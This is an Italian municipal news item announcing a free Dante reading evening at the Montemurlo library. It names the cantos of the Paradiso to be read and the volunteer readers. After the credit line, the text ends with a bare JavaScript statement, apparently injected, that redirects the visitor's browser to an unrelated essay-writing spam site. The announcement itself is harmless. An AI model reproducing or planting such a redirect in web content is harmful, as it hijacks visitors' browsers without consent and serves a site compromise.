MONTEMURLO. Dante continua a conquistare i montemurlesi. Dopo il successo delle prime tre serate, il Comune di Montemurlo ha deciso di replicare con le “letture dantesche” e giovedì 24 settembre alle 21:15 alla biblioteca “Bartolomeo Della Fonte” ha promosso un ultimo appuntamento dedicato al Sommo Poeta.
Dopo Inferno e Purgatorio, il viaggio prosegue sulle “vette” del Paradiso, del quale saranno letti il primo canto, che si svolge nel “cielo della luna”, dove si trovano coloro che mancarono ai voti fatti; il tredicesimo, dove risiedono gli spiriti sapienti; il ventitreesimo, dove Dante incontra gli “spiriti trionfanti”; il trentesimo nell’Empireo e il trentatreesimo con la preghiera alla Vergine e la visione di Dio, della Trinità e dell’Incarnazione.
Al leggìo si alterneranno otto volontari: Michael Paperetti, Iuri Nincheri, Francesco Leporatti, Edoardo Maria Bianchi, Deanna Tozzi Lastrucci, Amanda Ravagli, Leonello Rabatti, Gabriella Naldi. Alle precedenti serate avevano partecipato anche Samntha Giardino, Amina Elia, Sabrina Iacopetti, Elio Lombardo e Lucia Lasagni.
Le letture saranno precedute da una breve introduzione di una voce narrante. L’ingresso alla serata è libero e gratuito. Per maggiori informazioni si può contattare la biblioteca “B. Della Fonte”. Tel. 0574558561.
[masi – comune montemurlo]
window.location = “http://paper-help24h.com”;